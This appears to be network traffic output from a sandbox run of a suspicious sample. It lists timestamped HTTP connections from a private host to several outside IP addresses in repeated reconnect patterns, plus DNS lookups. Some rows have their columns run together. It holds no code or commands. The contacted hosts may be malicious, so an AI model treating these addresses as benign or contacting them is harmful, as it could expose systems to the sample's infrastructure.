                                                                                  Dec 9, 2024 06:58:36.369371891 CET804999546.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:36.369431019 CET4999580192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:36.601054907 CET4999580192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:37.621450901 CET4999680192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:37.740848064 CET804999646.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:37.747692108 CET4999680192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:37.786781073 CET4999680192.168.2.746.30.211.38
                                                                                  Dec 9, 2024 06:58:37.906246901 CET804999646.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:37.906276941 CET804999646.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:39.013392925 CET804999646.30.211.38192.168.2.7
                                                                                  Dec 9, 2024 06:58:39.013503075 CET804999646.30.211.38192.168.2.7
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Dec 9, 2024 06:58:39.013602018 CET  49996        80         192.168.2.7      46.30.211.38
Dec 9, 2024 06:58:39.288475990 CET  49996        80         192.168.2.7      46.30.211.38
Dec 9, 2024 06:58:40.309456110 CET  49997        80         192.168.2.7      46.30.211.38
Dec 9, 2024 06:58:40.428725004 CET  80           49997      46.30.211.38     192.168.2.7
Dec 9, 2024 06:58:40.428797007 CET  49997        80         192.168.2.7      46.30.211.38
Dec 9, 2024 06:58:40.581815004 CET  49997        80         192.168.2.7      46.30.211.38
Dec 9, 2024 06:58:40.701167107 CET  80           49997      46.30.211.38     192.168.2.7
Dec 9, 2024 06:58:41.691179991 CET  80           49997      46.30.211.38     192.168.2.7
Dec 9, 2024 06:58:41.691337109 CET  80           49997      46.30.211.38     192.168.2.7
Dec 9, 2024 06:58:41.691426992 CET  49997        80         192.168.2.7      46.30.211.38
Dec 9, 2024 06:58:41.695359945 CET  49997        80         192.168.2.7      46.30.211.38
Dec 9, 2024 06:58:41.814701080 CET  80           49997      46.30.211.38     192.168.2.7
Dec 9, 2024 06:58:47.226686001 CET  49998        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:47.346056938 CET  80           49998      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:47.346472025 CET  49998        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:47.507723093 CET  49998        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:47.627208948 CET  80           49998      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:48.580648899 CET  80           49998      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:48.580734015 CET  80           49998      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:48.580781937 CET  49998        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:49.007837057 CET  49998        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:50.029730082 CET  49999        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:50.149060965 CET  80           49999      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:50.149147034 CET  49999        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:50.169137955 CET  49999        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:50.288501978 CET  80           49999      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:51.388591051 CET  80           49999      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:51.388720989 CET  80           49999      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:51.391841888 CET  49999        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:51.679121971 CET  49999        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:52.699070930 CET  50000        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:52.818417072 CET  80           50000      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:52.818516016 CET  50000        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:52.838119030 CET  50000        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:52.957576036 CET  80           50000      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:52.957590103 CET  80           50000      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:54.138067961 CET  80           50000      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:54.138199091 CET  80           50000      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:54.138261080 CET  50000        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:54.351480961 CET  50000        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:55.373806953 CET  50001        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:55.493182898 CET  80           50001      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:55.493925095 CET  50001        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:55.505780935 CET  50001        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:55.625113964 CET  80           50001      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:56.729379892 CET  80           50001      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:56.729434967 CET  80           50001      77.68.64.45      192.168.2.7
Dec 9, 2024 06:58:56.729532003 CET  50001        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:56.732681036 CET  50001        80         192.168.2.7      77.68.64.45
Dec 9, 2024 06:58:56.851922989 CET  80           50001      77.68.64.45      192.168.2.7
Dec 9, 2024 06:59:03.054301023 CET  50002        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:03.173563004 CET  80           50002      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:03.179837942 CET  50002        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:03.191852093 CET  50002        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:03.311292887 CET  80           50002      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:04.694103003 CET  80           50002      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:04.694268942 CET  80           50002      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:04.694320917 CET  50002        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:04.694892883 CET  50002        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:05.713799953 CET  50003        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:05.833170891 CET  80           50003      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:05.835975885 CET  50003        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:05.851443052 CET  50003        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:05.970808983 CET  80           50003      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:07.109618902 CET  80           50003      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:07.109960079 CET  80           50003      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:07.117799997 CET  50003        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:07.369802952 CET  50003        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:08.386528015 CET  50004        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:08.505927086 CET  80           50004      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:08.506012917 CET  50004        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:08.525784969 CET  50004        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:08.645088911 CET  80           50004      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:08.645133972 CET  80           50004      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:09.802032948 CET  80           50004      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:09.802129984 CET  80           50004      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:09.805906057 CET  50004        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:10.038727999 CET  50004        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:11.058830976 CET  50005        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:11.178314924 CET  80           50005      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:11.181969881 CET  50005        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:11.193873882 CET  50005        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:11.315664053 CET  80           50005      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:12.456168890 CET  80           50005      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:12.456203938 CET  80           50005      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:12.456335068 CET  50005        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:12.459517956 CET  50005        80         192.168.2.7      146.88.233.115
Dec 9, 2024 06:59:12.578810930 CET  80           50005      146.88.233.115   192.168.2.7
Dec 9, 2024 06:59:18.192992926 CET  50006        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:18.312283993 CET  80           50006      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:18.312393904 CET  50006        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:18.333750963 CET  50006        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:18.453036070 CET  80           50006      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:19.595206976 CET  80           50006      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:19.595297098 CET  80           50006      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:19.595318079 CET  80           50006      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:19.595436096 CET  50006        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:19.836297989 CET  50006        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:20.854336977 CET  50007        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:20.973639011 CET  80           50007      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:20.973789930 CET  50007        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:20.989564896 CET  50007        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:21.109105110 CET  80           50007      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:22.289683104 CET  80           50007      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:22.289881945 CET  80           50007      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:22.289901018 CET  80           50007      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:22.289921999 CET  50007        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:22.289962053 CET  50007        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:22.492120981 CET  50007        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:23.513884068 CET  50008        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:23.633240938 CET  80           50008      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:23.633976936 CET  50008        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:23.649885893 CET  50008        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:23.769305944 CET  80           50008      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:23.769500017 CET  80           50008      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:25.010133028 CET  80           50008      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:25.010334015 CET  80           50008      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:25.010348082 CET  80           50008      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:25.010390997 CET  50008        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:25.010428905 CET  50008        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:25.164158106 CET  50008        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:26.183301926 CET  50009        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:26.302598953 CET  80           50009      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:26.302691936 CET  50009        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:26.322825909 CET  50009        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:26.442043066 CET  80           50009      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:27.583722115 CET  80           50009      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:27.583761930 CET  80           50009      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:27.583775043 CET  80           50009      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:27.583853006 CET  80           50009      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:27.583865881 CET  80           50009      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:27.583945036 CET  50009        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:27.583945036 CET  50009        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:27.584403992 CET  80           50009      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:27.584666014 CET  50009        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:27.589927912 CET  50009        80         192.168.2.7      217.160.0.200
Dec 9, 2024 06:59:27.709180117 CET  80           50009      217.160.0.200    192.168.2.7
Dec 9, 2024 06:59:33.020015955 CET  50010        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:33.139281988 CET  80           50010      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:33.139491081 CET  50010        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:33.156054020 CET  50010        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:33.275305033 CET  80           50010      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:34.246535063 CET  80           50010      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:34.246646881 CET  80           50010      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:34.246687889 CET  50010        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:34.663876057 CET  50010        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:35.682265997 CET  50011        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:35.801632881 CET  80           50011      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:35.802023888 CET  50011        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:35.816483021 CET  50011        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:35.935921907 CET  80           50011      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:36.899353981 CET  80           50011      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:36.899466038 CET  80           50011      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:36.899514914 CET  50011        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:37.320393085 CET  50011        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:38.344839096 CET  50012        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:38.464241028 CET  80           50012      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:38.464324951 CET  50012        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:38.482201099 CET  50012        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:38.601489067 CET  80           50012      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:38.601798058 CET  80           50012      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:39.563843012 CET  80           50012      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:39.563966990 CET  80           50012      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:39.564179897 CET  50012        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:39.992021084 CET  50012        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:41.010992050 CET  50013        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:41.130842924 CET  80           50013      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:41.130940914 CET  50013        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:41.140810966 CET  50013        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:41.336150885 CET  80           50013      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:42.232922077 CET  80           50013      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:42.233601093 CET  80           50013      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:42.233654022 CET  50013        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:42.235946894 CET  50013        80         192.168.2.7      13.248.169.48
Dec 9, 2024 06:59:42.355185032 CET  80           50013      13.248.169.48    192.168.2.7
Dec 9, 2024 06:59:52.898859978 CET  50014        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:53.018248081 CET  80           50014      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:53.018400908 CET  50014        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:53.030214071 CET  50014        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:53.149527073 CET  80           50014      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:54.311187983 CET  80           50014      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:54.311366081 CET  80           50014      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:54.311479092 CET  50014        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:54.551119089 CET  50014        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:55.558001995 CET  50015        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:55.677426100 CET  80           50015      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:55.677546024 CET  50015        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:55.692626953 CET  50015        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:55.812089920 CET  80           50015      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:56.969290972 CET  80           50015      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:56.969527006 CET  80           50015      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:56.969568014 CET  50015        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:57.198007107 CET  50015        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:58.213993073 CET  50016        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:58.334321022 CET  80           50016      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:58.334491968 CET  50016        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:58.352252960 CET  50016        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:58.471719980 CET  80           50016      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:58.471738100 CET  80           50016      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:59.626090050 CET  80           50016      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:59.706099987 CET  50016        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:59.731440067 CET  80           50016      81.2.196.19      192.168.2.7
Dec 9, 2024 06:59:59.731508970 CET  50016        80         192.168.2.7      81.2.196.19
Dec 9, 2024 06:59:59.870028019 CET  50016        80         192.168.2.7      81.2.196.19
Dec 9, 2024 07:00:00.886981010 CET  50017        80         192.168.2.7      81.2.196.19
Dec 9, 2024 07:00:01.006226063 CET  80           50017      81.2.196.19      192.168.2.7
Dec 9, 2024 07:00:01.006467104 CET  50017        80         192.168.2.7      81.2.196.19
Dec 9, 2024 07:00:01.016196966 CET  50017        80         192.168.2.7      81.2.196.19
Dec 9, 2024 07:00:01.135587931 CET  80           50017      81.2.196.19      192.168.2.7
Dec 9, 2024 07:00:02.298327923 CET  80           50017      81.2.196.19      192.168.2.7
Dec 9, 2024 07:00:02.298559904 CET  80           50017      81.2.196.19      192.168.2.7
Dec 9, 2024 07:00:02.298681021 CET  50017        80         192.168.2.7      81.2.196.19
Dec 9, 2024 07:00:02.302846909 CET  50017        80         192.168.2.7      81.2.196.19
Dec 9, 2024 07:00:02.422328949 CET  80           50017      81.2.196.19      192.168.2.7
Dec 9, 2024 07:00:12.637505054 CET  50018        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:12.756791115 CET  80           50018      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:12.756865978 CET  50018        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:12.780421972 CET  50018        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:12.899733067 CET  80           50018      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:14.169251919 CET  80           50018      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:14.169265985 CET  80           50018      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:14.169270039 CET  80           50018      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:14.169279099 CET  80           50018      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:14.169394970 CET  50018        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:14.277475119 CET  80           50018      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:14.277544022 CET  50018        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:14.299036980 CET  50018        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:15.310096025 CET  50019        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:15.429452896 CET  80           50019      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:15.430213928 CET  50019        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:15.444647074 CET  50019        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:15.563941956 CET  80           50019      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:16.709985971 CET  80           50019      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:16.710019112 CET  80           50019      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:16.710059881 CET  50019        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:16.710700989 CET  80           50019      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:16.710760117 CET  50019        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:16.961054087 CET  50019        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:17.982503891 CET  50020        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:18.102287054 CET  80           50020      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:18.110152960 CET  50020        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:18.122150898 CET  50020        80         192.168.2.7      172.67.215.235
Dec 9, 2024 07:00:18.241772890 CET  80           50020      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:18.241787910 CET  80           50020      172.67.215.235   192.168.2.7
Dec 9, 2024 07:00:19.388838053 CET  80           50020      172.67.215.235   192.168.2.7
                                                                                  Dec 9, 2024 07:00:19.388874054 CET8050020172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:19.389782906 CET8050020172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:19.390028954 CET5002080192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:19.633058071 CET5002080192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:20.653455973 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:20.772707939 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:20.772819042 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:20.791956902 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:20.911413908 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050440073 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050472975 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050487041 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050553083 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050565958 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050575972 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050604105 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050641060 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.050717115 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.050723076 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050750017 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050764084 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.050808907 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.050808907 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.170301914 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.170370102 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.170569897 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.249500036 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.249573946 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.249655008 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.253633976 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.255187035 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.255232096 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.255269051 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.264244080 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.264276028 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.264312029 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.271965027 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.272054911 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.275434971 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.394782066 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:27.607300997 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:27.727829933 CET8050022172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:27.730257034 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:27.745157957 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:27.864379883 CET8050022172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:28.970876932 CET8050022172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:28.970899105 CET8050022172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:28.970978022 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:30.961020947 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:31.979919910 CET5002380192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:32.099172115 CET8050023172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:32.102195978 CET5002380192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:32.115936041 CET5002380192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:32.235347033 CET8050023172.67.145.234192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 06:56:56.362745047 CET | 64393 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:56:57.367064953 CET | 64393 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:56:57.457525015 CET | 53 | 64393 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:56:57.503634930 CET | 53 | 64393 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:57:13.963654041 CET | 54940 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:57:14.421592951 CET | 53 | 54940 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:57:28.807216883 CET | 53940 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:57:29.624012947 CET | 53 | 53940 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:57:44.042133093 CET | 53514 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:57:44.315646887 CET | 53 | 53514 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:57:52.375577927 CET | 58726 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:57:52.689178944 CET | 53 | 58726 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:58:00.746124983 CET | 65146 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:58:01.757503033 CET | 65146 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:58:01.839505911 CET | 53 | 65146 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:58:01.894903898 CET | 53 | 65146 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:58:16.105457067 CET | 57879 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:58:16.870870113 CET | 53 | 57879 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:58:31.535557985 CET | 54894 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:58:32.284651041 CET | 53 | 54894 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:58:46.699250937 CET | 65053 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:58:47.223709106 CET | 53 | 65053 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:59:01.746284008 CET | 58788 | 53 | 192.168.2.7 | 1.1.1.1
